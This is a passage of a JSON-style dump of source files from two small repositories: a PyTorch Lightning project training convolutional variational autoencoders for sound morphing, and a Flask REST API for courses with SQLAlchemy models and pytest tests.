DataLoader(self.data_train, batch_size=self.batch_size, shuffle=True, drop_last=True, num_workers=self.num_workers)\n\n def val_dataloader(self):\n return DataLoader(self.data_val, batch_size=self.batch_size, shuffle=False, drop_last=True, num_workers=self.num_workers)\n\n def test_dataloader(self):\n return None\n" }, { "alpha_fraction": 0.7636363506317139, "alphanum_fraction": 0.7696969509124756, "avg_line_length": 21.5, "blob_id": "a5f2ca5a059263db3018faebcdf0656683cf4ed7", "content_id": "c192be89f1e0504866505aa6b3d68fb2417d1b8d", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 495, "license_type": "no_license", "max_line_length": 89, "num_lines": 22, "path": "/README.md", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "# Sond morphing with deep learning\n\n## About\n...\n\n## Getting Started\nClone repository, create a conda environment, and install dependencies:\n```sh\ngit clone [email protected]:miccio-dk/sound_morph.git\ncd ./sound_morph\nconda create --name sound_morph\nconda activate sound_morph\nconda install pytorch torchvision torchaudio cudatoolkit=10.2 -c pytorch\nconda install scipy pandas scikit-learn librosa tqdm matplotlib seaborn pytorch_lightning\nconda install pip nodejs jupyterlab\n...\n```\n\n## Usage\n```sh\n\n```\n" }, { "alpha_fraction": 0.6686119437217712, "alphanum_fraction": 0.6694455742835999, "avg_line_length": 28.2560977935791, "blob_id": "7aff5229bdf3e940d7c7c3390639e365136e2cbf", "content_id": "5b1acea36f87ca7dcb172b6e4493db5d1cbd797b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2399, "license_type": "no_license", "max_line_length": 98, "num_lines": 82, "path": "/train.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import warnings\nwarnings.simplefilter(\"ignore\", UserWarning)\n\nimport os\nimport json\nimport numpy as np\nimport librosa as lr\nimport torch\nimport pytorch_lightning as pl\n\nfrom argparse import ArgumentParser\nfrom pprint import pprint\nfrom scipy.signal.windows import hann\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom pytorch_lightning.callbacks import LearningRateMonitor, EarlyStopping\n\nfrom datasets.nsynth_datamodule import NsynthDataModule\nfrom models.cvae_resnet import CvaeResnet\nfrom models.cvae_inception import CvaeInception\nfrom models.vae_inception import VaeInception\nfrom models.vae_inception_custom import VaeInceptionCustom\n\n\ndef main(args):\n pl.seed_everything(42)\n \n # load configs\n with open(args.cfg_path, 'r') as fp:\n cfg = json.load(fp)\n cfg_train = cfg['train']\n print('### TRAIN CONFIGS:')\n pprint(cfg_train)\n print('### MODEL CONFIGS:')\n pprint(cfg['model'])\n #os.environ['CUDA_VISIBLE_DEVICES'] = cfg_train['trainer_kwargs']['gpus']\n \n # load or init model\n ModelClass = {\n 'cvae': CvaeInception,\n 'vae': VaeInception,\n 'vae_cstm': VaeInceptionCustom\n }[cfg_train['type']]\n if args.ckpt_path:\n print(\"Loading pretrained model..\")\n model = ModelClass.load_from_checkpoint(checkpoint_path=args.ckpt_path, map_location=None)\n else:\n print(\"Initing new model..\")\n model = ModelClass(cfg['model'])\n \n # init data loader\n dm = NsynthDataModule(\n cfg['dataset'], \n num_workers=cfg_train['num_workers'], \n batch_size=cfg_train['batch_size'])\n dm.setup()\n \n # logger\n log_name = '{}_{}'.format(ModelClass.model_name, cfg_train['descr'])\n logger = TensorBoardLogger(save_dir='logs', name=log_name)\n \n # callbacks\n early_stop = EarlyStopping(monitor='val_loss', patience=cfg_train['patience'])\n lr_monitor = LearningRateMonitor(logging_interval='epoch')\n\n # trainer\n trainer = pl.Trainer(\n max_epochs=cfg_train['max_epochs'],\n logger=logger,\n callbacks=[early_stop, lr_monitor],\n **cfg_train['trainer_kwargs'])\n \n # train\n trainer.fit(model=model, datamodule=dm)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('cfg_path', type=str)\n parser.add_argument('--ckpt_path', type=str)\n args = parser.parse_args()\n\n 
main(args)\n" }, { "alpha_fraction": 0.5554906725883484, "alphanum_fraction": 0.5775264501571655, "avg_line_length": 31.789474487304688, "blob_id": "c35fa5ea364108504c69fc571de6f20b43778778", "content_id": "d045ab52ea55422479cd1af96e868c3959b24601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13705, "license_type": "no_license", "max_line_length": 119, "num_lines": 418, "path": "/models/cvae_resnet.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom .cvae_base import CvaeBase\nfrom .utils import spec_to_db\n\n\nclass CvaeResnet(CvaeBase):\n model_name = 'CvaeResnet'\n\n def __init__(self, configs):\n super().__init__(configs)\n self.save_hyperparameters()\n valid_encoders = {\n 'resnet18': {'enc': resnet18_encoder, 'dec': resnet18_decoder},\n 'resnet50': {'enc': resnet50_encoder, 'dec': resnet50_decoder},\n }\n c_length = len(configs['c_labels'])\n # Encoder\n self.encoder = valid_encoders[configs['enc_type']]['enc'](configs['channel_size'], \n configs['first_conv'], \n configs['maxpool1'])\n # Bottleneck\n self.fc_mu = nn.Linear(configs['enc_out_dim'] + c_length, \n configs['latent_size'])\n self.fc_logvar = nn.Linear(configs['enc_out_dim'] + c_length, \n configs['latent_size'])\n # Decoder\n self.decoder = valid_encoders[configs['enc_type']]['dec'](configs['channel_size'], \n configs['latent_size'] + c_length, \n configs['input_height'], \n configs['first_conv'], \n configs['maxpool1'])\n\n def _loss_function(self, x_true, x_rec, mean, log_var, z):\n # reconstruction\n rec = F.mse_loss(x_rec, x_true, reduction='mean')\n # db mag reconstruction\n x_rec_db = spec_to_db(x_rec)\n x_true_db = spec_to_db(x_true)\n rec_db = F.mse_loss(x_rec_db, x_true_db, reduction='mean')\n # kl divergence\n std = torch.exp(log_var / 2)\n p = torch.distributions.Normal(torch.zeros_like(mean), torch.ones_like(std))\n q = torch.distributions.Normal(mean, std)\n log_qz = q.log_prob(z)\n log_pz = p.log_prob(z)\n kld = log_qz - log_pz\n kld = kld.mean()\n # total\n loss = rec + (rec_db * self.configs['db_coeff']) + (kld * self.configs['kl_coeff'])\n return {\n 'rec': rec, \n 'rec_db': rec_db,\n 'kl': kld,\n 'loss': loss\n }\n \n def _shared_eval(self, x_true, c):\n # calculate latent vector\n hidden_enc = self.encoder(x_true)\n hidden_enc = torch.cat((hidden_enc, c), dim=-1)\n mean, log_var = self.fc_mu(hidden_enc), self.fc_logvar(hidden_enc)\n z = self._reparameterize(mean, log_var)\n # reconstruct\n zc = torch.cat((z, c), dim=-1)\n x_rec = self.decoder(zc)\n return x_rec, mean, log_var, z\n \n def forward(self, z, c):\n z = torch.cat((z, c), dim=-1)\n return self.decoder(z)\n\n \n \n# https://github.com/PyTorchLightning/pytorch-lightning-bolts/pl_bolts/models/autoencoders/components.py\nclass Interpolate(nn.Module):\n \"\"\"nn.Module wrapper for F.interpolate\"\"\"\n\n def __init__(self, size=None, scale_factor=None):\n super().__init__()\n self.size, self.scale_factor = size, scale_factor\n\n def forward(self, x):\n return F.interpolate(x, size=self.size, scale_factor=self.scale_factor)\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\ndef 
resize_conv3x3(in_planes, out_planes, scale=1):\n \"\"\"upsample + 3x3 convolution with padding to avoid checkerboard artifact\"\"\"\n if scale == 1:\n return conv3x3(in_planes, out_planes)\n else:\n return nn.Sequential(Interpolate(scale_factor=scale), conv3x3(in_planes, out_planes))\n\n\ndef resize_conv1x1(in_planes, out_planes, scale=1):\n \"\"\"upsample + 1x1 convolution with padding to avoid checkerboard artifact\"\"\"\n if scale == 1:\n return conv1x1(in_planes, out_planes)\n else:\n return nn.Sequential(Interpolate(scale_factor=scale), conv1x1(in_planes, out_planes))\n\n\nclass EncoderBlock(nn.Module):\n \"\"\"\n ResNet block, copied from\n https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py#L35\n \"\"\"\n\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super().__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass EncoderBottleneck(nn.Module):\n \"\"\"\n ResNet bottleneck, copied from\n https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py#L75\n \"\"\"\n\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super().__init__()\n width = planes # this needs to change if we want wide resnets\n self.conv1 = conv1x1(inplanes, width)\n self.bn1 = nn.BatchNorm2d(width)\n self.conv2 = conv3x3(width, width, stride)\n self.bn2 = nn.BatchNorm2d(width)\n self.conv3 = conv1x1(width, planes * self.expansion)\n self.bn3 = nn.BatchNorm2d(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n return out\n\n\nclass DecoderBlock(nn.Module):\n \"\"\"\n ResNet block, but convs replaced with resize convs, and channel increase is in\n second conv, not first\n \"\"\"\n\n expansion = 1\n\n def __init__(self, inplanes, planes, scale=1, upsample=None):\n super().__init__()\n self.conv1 = resize_conv3x3(inplanes, inplanes)\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = resize_conv3x3(inplanes, planes, scale)\n self.bn2 = nn.BatchNorm2d(planes)\n self.upsample = upsample\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.upsample is not None:\n identity = self.upsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass DecoderBottleneck(nn.Module):\n \"\"\"\n ResNet bottleneck, but convs replaced with resize convs\n \"\"\"\n\n expansion = 4\n\n def __init__(self, inplanes, planes, scale=1, upsample=None):\n super().__init__()\n width = planes # this needs to change if we want wide resnets\n self.conv1 = resize_conv1x1(inplanes, width)\n self.bn1 = 
nn.BatchNorm2d(width)\n self.conv2 = resize_conv3x3(width, width, scale)\n self.bn2 = nn.BatchNorm2d(width)\n self.conv3 = conv1x1(width, planes * self.expansion)\n self.bn3 = nn.BatchNorm2d(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.upsample = upsample\n self.scale = scale\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.upsample is not None:\n identity = self.upsample(x)\n\n out += identity\n out = self.relu(out)\n return out\n\n\nclass ResNetEncoder(nn.Module):\n def __init__(self, block, layers, channel_size, first_conv=False, maxpool1=False):\n super().__init__()\n\n self.inplanes = 64\n self.first_conv = first_conv\n self.maxpool1 = maxpool1\n\n if self.first_conv:\n self.conv1 = nn.Conv2d(channel_size, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)\n else:\n self.conv1 = nn.Conv2d(channel_size, self.inplanes, kernel_size=3, stride=1, padding=1, bias=False)\n\n self.bn1 = nn.BatchNorm2d(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n\n if self.maxpool1:\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n else:\n self.maxpool = nn.MaxPool2d(kernel_size=1, stride=1)\n\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n return x\n\n\nclass ResNetDecoder(nn.Module):\n \"\"\"\n Resnet in reverse order\n \"\"\"\n\n def __init__(self, block, layers, channel_size, latent_dim, input_height, first_conv=False, maxpool1=False):\n super().__init__()\n\n self.expansion = block.expansion\n self.inplanes = 512 * block.expansion\n self.first_conv = first_conv\n self.maxpool1 = maxpool1\n self.input_height = input_height\n\n self.upscale_factor = 8\n\n self.linear = nn.Linear(latent_dim, self.inplanes * 4 * 4)\n\n self.layer1 = self._make_layer(block, 256, layers[0], scale=2)\n self.layer2 = self._make_layer(block, 128, layers[1], scale=2)\n self.layer3 = self._make_layer(block, 64, layers[2], scale=2)\n\n if self.maxpool1:\n self.layer4 = self._make_layer(block, 64, layers[3], scale=2)\n self.upscale_factor *= 2\n else:\n self.layer4 = self._make_layer(block, 64, layers[3])\n\n if self.first_conv:\n self.upscale = Interpolate(scale_factor=2)\n self.upscale_factor *= 2\n else:\n self.upscale = Interpolate(scale_factor=1)\n\n # interpolate after linear layer using scale factor\n self.upscale1 = Interpolate(size=input_height // self.upscale_factor)\n\n self.conv1 = 
nn.Conv2d(64 * block.expansion, channel_size, kernel_size=3, stride=1, padding=1, bias=False)\n\n def _make_layer(self, block, planes, blocks, scale=1):\n upsample = None\n if scale != 1 or self.inplanes != planes * block.expansion:\n upsample = nn.Sequential(\n resize_conv1x1(self.inplanes, planes * block.expansion, scale),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, scale, upsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.linear(x)\n\n # NOTE: replaced this by Linear(in_channels, 514 * 4 * 4)\n # x = F.interpolate(x, scale_factor=4)\n\n x = x.view(x.size(0), 512 * self.expansion, 4, 4)\n x = self.upscale1(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n x = self.upscale(x)\n\n x = self.conv1(x)\n return x\n\n\ndef resnet18_encoder(channel_size, first_conv, maxpool1):\n return ResNetEncoder(EncoderBlock, [2, 2, 2, 2], channel_size, first_conv, maxpool1)\n\n\ndef resnet18_decoder(channel_size, latent_dim, input_height, first_conv, maxpool1):\n return ResNetDecoder(DecoderBlock, [2, 2, 2, 2], channel_size, latent_dim, input_height, first_conv, maxpool1)\n\n\ndef resnet50_encoder(channel_size, first_conv, maxpool1):\n return ResNetEncoder(EncoderBottleneck, [3, 4, 6, 3], channel_size, first_conv, maxpool1)\n\n\ndef resnet50_decoder(channel_size, latent_dim, input_height, first_conv, maxpool1):\n return ResNetDecoder(DecoderBottleneck, [3, 4, 6, 3], channel_size, latent_dim, input_height, first_conv, maxpool1)" }, { "alpha_fraction": 0.5873967409133911, "alphanum_fraction": 0.60877925157547, "avg_line_length": 41.090476989746094, "blob_id": "16183d8e7202c6a8c8174b33d72c59131d85afa1", "content_id": "aa8ce520427037a0f273ed6b579d88f1e9cc9d4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8839, "license_type": "no_license", "max_line_length": 117, "num_lines": 210, "path": "/models/cvae_inception.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .cvae_base import CvaeBase\nfrom .utils import spec_to_db\n\n\nclass CvaeInception(CvaeBase):\n model_name = 'CvaeInception'\n \n def __init__(self, configs):\n super().__init__(configs)\n self.db_weight = 1\n use_inception, repeat_per_block = configs['use_inception'], configs['repeat_per_block']\n # Encoder\n self.encoder = Encoder(configs['channel_size'], use_inception, repeat_per_block)\n # Bottleneck\n self.fc_mu = nn.Linear(configs['dense_size'] + len(configs['c_labels']), configs['latent_size'])\n self.fc_logvar = nn.Linear(configs['dense_size'] + len(configs['c_labels']), configs['latent_size'])\n self.fc_rep = nn.Linear(configs['latent_size'] + len(configs['c_labels']), configs['dense_size'])\n # Decoder\n self.decoder = Decoder(configs['channel_size'], use_inception, repeat_per_block)\n\n def _loss_function(self, x_true, x_rec, mean, log_var, z):\n # reconstruction\n #rec = torch.nn.functional.binary_cross_entropy(x_rec, x_true, reduction='mean')\n rec = torch.nn.functional.mse_loss(x_rec, x_true, reduction='mean')\n # db mag reconstruction\n x_rec_db = spec_to_db(x_rec, **self.configs['db_kwargs'])\n x_true_db = spec_to_db(x_true, **self.configs['db_kwargs'])\n rec_db = F.mse_loss(x_rec_db, x_true_db, reduction='mean')\n # kl 
divergence\n kld = torch.mean(-0.5 * torch.sum(1 + log_var - mean.pow(2) - log_var.exp(), dim=1), dim=0)\n # total\n loss = rec + (rec_db * self.configs['db_coeff'] * self.db_weight) + (kld * self.configs['kl_coeff'])\n return {\n 'rec': rec, \n 'rec_db': rec_db,\n 'kl': kld,\n 'loss': loss\n }\n\n def _shared_eval(self, x_true, c):\n # calculate latent vector\n hidden_enc = self.encoder(x_true)\n hidden_enc = torch.cat((hidden_enc, c), dim=-1)\n mean, log_var = self.fc_mu(hidden_enc), self.fc_logvar(hidden_enc)\n z = self._reparameterize(mean, log_var)\n # reconstruct\n zc = torch.cat((z, c), dim=-1)\n hidden_dec = self.fc_rep(zc)\n x_rec = self.decoder(hidden_dec)\n return x_rec, mean, log_var, z\n \n # TODO encode() / decode() functions?\n \n def forward(self, z, c):\n z = torch.cat((z, c), dim=-1)\n hidden_dec = self.fc_rep(z)\n return self.decoder(hidden_dec)\n \n def on_epoch_start(self):\n self.db_weight *= self.configs['db_decay']\n \n\n \n# Inception-vae - https://github.com/koshian2/inception-vae\n## Encoder\ndef create_encoder_single_conv(in_chs, out_chs, kernel):\n assert kernel % 2 == 1\n return nn.Sequential(\n nn.Conv2d(in_chs, out_chs, kernel_size=kernel, padding=(kernel - 1) // 2),\n nn.BatchNorm2d(out_chs),\n nn.ReLU(inplace=True))\n\nclass EncoderInceptionModuleSingle(nn.Module):\n def __init__(self, channels):\n assert channels % 2 == 0\n super().__init__()\n # put bottle-neck layers before convolution\n bn_ch = channels // 2\n self.bottleneck = create_encoder_single_conv(channels, bn_ch, 1)\n # bn -> Conv1, 3, 5\n self.conv1 = create_encoder_single_conv(bn_ch, channels, 1)\n self.conv3 = create_encoder_single_conv(bn_ch, channels, 3)\n self.conv5 = create_encoder_single_conv(bn_ch, channels, 5)\n self.conv7 = create_encoder_single_conv(bn_ch, channels, 7)\n # pool-proj(no-bottle neck)\n self.pool3 = nn.MaxPool2d(3, stride=1, padding=1)\n self.pool5 = nn.MaxPool2d(5, stride=1, padding=2)\n\n def forward(self, x):\n # Original inception is concatenation, but use simple addition instead\n bn = self.bottleneck(x)\n out = self.conv1(bn) + self.conv3(bn) + self.conv5(bn) + self.conv7(bn) + self.pool3(x) + self.pool5(x)\n return out\n\nclass EncoderModule(nn.Module):\n def __init__(self, chs, repeat_num, use_inception):\n super().__init__()\n if use_inception:\n layers = [EncoderInceptionModuleSingle(chs) for i in range(repeat_num)]\n else:\n layers = [create_encoder_single_conv(chs, chs, 3) for i in range(repeat_num)]\n self.convs = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.convs(x)\n\nclass Encoder(nn.Module):\n def __init__(self, in_channel_size, use_inception, repeat_per_module):\n super().__init__()\n # stages\n self.upch1 = nn.Conv2d(in_channel_size, 32, kernel_size=1)\n self.stage1 = EncoderModule(32, repeat_per_module, use_inception)\n self.upch2 = self._create_downsampling_module(32, 4)\n self.stage2 = EncoderModule(64, repeat_per_module, use_inception)\n self.upch3 = self._create_downsampling_module(64, 4)\n self.stage3 = EncoderModule(128, repeat_per_module, use_inception)\n self.upch4 = self._create_downsampling_module(128, 2)\n self.stage4 = EncoderModule(256, repeat_per_module, use_inception)\n\n def _create_downsampling_module(self, input_channels, pooling_kenel):\n return nn.Sequential(\n nn.AvgPool2d(pooling_kenel),\n nn.Conv2d(input_channels, input_channels * 2, kernel_size=1),\n nn.BatchNorm2d(input_channels * 2),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n out = self.stage1(self.upch1(x))\n out = 
self.stage2(self.upch2(out))\n out = self.stage3(self.upch3(out))\n out = self.stage4(self.upch4(out))\n out = F.avg_pool2d(out, 8) # Global Average pooling\n return out.view(-1, 256) # TODO un-hardcode linear features\n\n## Decoder\ndef create_decoder_single_conv(in_chs, out_chs, kernel):\n assert kernel % 2 == 1\n return nn.Sequential(\n nn.ConvTranspose2d(in_chs, out_chs, kernel_size=kernel, padding=(kernel - 1) // 2),\n nn.BatchNorm2d(out_chs),\n nn.ReLU(inplace=True))\n\nclass DecoderInceptionModuleSingle(nn.Module):\n def __init__(self, channels):\n assert channels % 2 == 0\n super().__init__()\n # put bottle-neck layers before convolution\n bn_ch = channels // 4\n self.bottleneck = create_decoder_single_conv(channels, bn_ch, 1)\n # bn -> Conv1, 3, 5\n self.conv1 = create_decoder_single_conv(bn_ch, channels, 1)\n self.conv3 = create_decoder_single_conv(bn_ch, channels, 3)\n self.conv5 = create_decoder_single_conv(bn_ch, channels, 5)\n self.conv7 = create_decoder_single_conv(bn_ch, channels, 7)\n # pool-proj(no-bottle neck)\n self.pool3 = nn.MaxPool2d(3, stride=1, padding=1)\n self.pool5 = nn.MaxPool2d(5, stride=1, padding=2)\n\n def forward(self, x):\n # Original inception is concatenation, but use simple addition instead\n bn = self.bottleneck(x)\n out = self.conv1(bn) + self.conv3(bn) + self.conv5(bn) + self.conv7(bn) + self.pool3(x) + self.pool5(x)\n return out\n\nclass DecoderModule(nn.Module):\n def __init__(self, chs, repeat_num, use_inception):\n super().__init__()\n if use_inception:\n layers = [DecoderInceptionModuleSingle(chs) for i in range(repeat_num)]\n else:\n layers = [create_decoder_single_conv(chs, chs, 3) for i in range(repeat_num)]\n self.convs = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.convs(x)\n\n\nclass Decoder(nn.Module):\n def __init__(self, out_channel_size, use_inception, repeat_per_module):\n super().__init__()\n # stages\n self.stage1 = DecoderModule(256, repeat_per_module, use_inception)\n self.downch1 = self._create_upsampling_module(256, 2)\n self.stage2 = DecoderModule(128, repeat_per_module, use_inception)\n self.downch2 = self._create_upsampling_module(128, 4)\n self.stage3 = DecoderModule(64, repeat_per_module, use_inception)\n self.downch3 = self._create_upsampling_module(64, 4)\n self.stage4 = DecoderModule(32, repeat_per_module, use_inception)\n self.last = nn.ConvTranspose2d(32, out_channel_size, kernel_size=1)\n\n def _create_upsampling_module(self, input_channels, pooling_kenel):\n return nn.Sequential(\n nn.ConvTranspose2d(input_channels, input_channels // 2, kernel_size=pooling_kenel, stride=pooling_kenel),\n nn.BatchNorm2d(input_channels // 2),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n out = F.interpolate(x.view(-1, 256, 1, 1), scale_factor=8)\n out = self.downch1(self.stage1(out))\n out = self.downch2(self.stage2(out))\n out = self.downch3(self.stage3(out))\n out = self.stage4(out)\n #return torch.sigmoid(self.last(out))\n return self.last(out)\n" } ]
11
yarik2215/yalantis-test
https://github.com/yarik2215/yalantis-test
2a445a54532734e634efa8657d2b426eb9b96335
fa3509a3388b5cc4d4f0d92c390f525ee28e7c51
c243030cc414828fddd85d08a2ec2fc7d346fda0
refs/heads/master
2023-04-13T10:25:08.561030
2021-04-21T09:02:52
2021-04-21T09:02:52
360,102,596
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.676369845867157, "alphanum_fraction": 0.681506872177124, "avg_line_length": 24.434782028198242, "blob_id": "49999ef5c82b1f5420fe3295d6794470280c025e", "content_id": "dfd42f61c86f529943edc8785ffc5cd29e7850b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 584, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/courses_app/routes.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "from flask import Blueprint\nfrom flask.app import Flask\nfrom flask_restful import Api, Resource\nfrom courses_app import resources\n\n\ndef register_routes(_app: Flask):\n \"\"\"Registers api resources/routes with Flask app\n\n Args:\n _app (object): Flask app object\n\n \"\"\"\n\n api_blueprint = Blueprint(\"api\", __name__)\n api = Api(api_blueprint, catch_all_404s=False)\n\n api.add_resource(\n resources.CoursesList, \"/courses\")\n api.add_resource(\n resources.CoursesDetailed, \"/courses/<int:id>\")\n\n _app.register_blueprint(api_blueprint, url_prefix=\"/api\")" }, { "alpha_fraction": 0.5556536912918091, "alphanum_fraction": 0.5914310812950134, "avg_line_length": 22.842105865478516, "blob_id": "606189ee8a07db2cdafdd78cd9cd8cb03c5a47ce", "content_id": "a2b89b836f37bb5918ec2dceb2378a0ddc0dccca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2264, "license_type": "no_license", "max_line_length": 74, "num_lines": 95, "path": "/tests/test_api.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "import pytest\nimport datetime\n\nfrom courses_app.models import Course\n\n\ndef test_retrieve_emty_list(client, database):\n response = client.get(\n '/courses'\n )\n assert response.json == []\n\n\ndef test_retrieve_courses_list(client, courses):\n response = client.get(\n '/courses'\n )\n assert len(response.json) == len(courses)\n assert [i['name'] for i in response.json] == [i.name for i in courses]\n\n\ndef test_create_course_200_ok(client, database):\n course_data = {\n \"name\": \"3\",\n \"starting_date\": \"2020-05-01\",\n \"ending_date\": \"2020-08-12\",\n \"lectures_count\": 3\n }\n response = client.post(\n '/courses',\n json = course_data\n )\n response.json.pop('id')\n assert response.status_code == 200\n assert response.json == course_data\n\n\ndef test_course_name_unique_constrain(client, courses):\n course_data = {\n \"name\": courses[0].name,\n \"starting_date\": \"2020-5-1\",\n \"ending_date\": \"2020-8-12\",\n \"lectures_count\": 3\n }\n response = client.post(\n '/courses',\n json = course_data\n )\n assert response.status_code == 400\n\n\ndef test_course_retrieve_by_id_200_ok(client, courses):\n id = 1\n course = Course.query.get(id)\n response = client.get(\n f'/courses/{id}'\n )\n assert response.status_code == 200\n assert response.json['name'] == course.name\n\n\ndef test_delete_course_by_id_200_ok(client, courses):\n id = 1\n response = client.delete(\n f'/courses/{id}'\n )\n course = Course.query.get(id)\n assert response.status_code == 200\n assert course is None\n\n\ndef test_try_to_delete_not_existed_course(client, courses):\n id = 1245\n response = client.delete(\n f'/courses/{id}'\n )\n assert response.status_code == 400\n\n\ndef test_update_course_attributes(client, courses):\n id = 1\n course_data = {\n \"name\": \"New name\",\n \"starting_date\": \"2020-5-1\",\n \"ending_date\": \"2020-8-12\",\n \"lectures_count\": 8\n }\n response = client.put(\n 
f'/courses/{id}',\n        json = course_data\n    )\n    course = Course.query.get(id)\n    assert response.status_code == 200\n    assert response.json['name'] == \"New name\"\n    assert course.name == \"New name\"" }, { "alpha_fraction": 0.6648648381233215, "alphanum_fraction": 0.6702702641487122, "avg_line_length": 26.700000762939453, "blob_id": "942a3c163308c814262b2ba48742cb1cf927c1f8", "content_id": "075ad19643e9849ce096735cbbda514655151edf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 555, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/courses_app/models.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import MetaData\nfrom flask_migrate import Migrate\n\nmetadata = MetaData()\ndb = SQLAlchemy(metadata=metadata)\nmigrate = Migrate()\n\n\nclass Course(db.Model):\n    __tablename__ = \"courses\"\n\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String(255), unique=True)\n    starting_date = db.Column(db.Date())\n    ending_date = db.Column(db.Date())\n    lectures_count = db.Column(db.Integer)\n\n    def __repr__(self) -> str:\n        return f\"<{self.__class__.__name__}: {self.name}>\"\n" }, { "alpha_fraction": 0.7518796920776367, "alphanum_fraction": 0.7518796920776367, "avg_line_length": 32.5, "blob_id": "24cf0499fb17a4db967eb9e066fa95fa5ab4fe82", "content_id": "09af552bb5c32a7d8919f1fb068650a577dbec66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 133, "license_type": "no_license", "max_line_length": 57, "num_lines": 4, "path": "/README.md", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "## Run locally\n- set environment variables `export 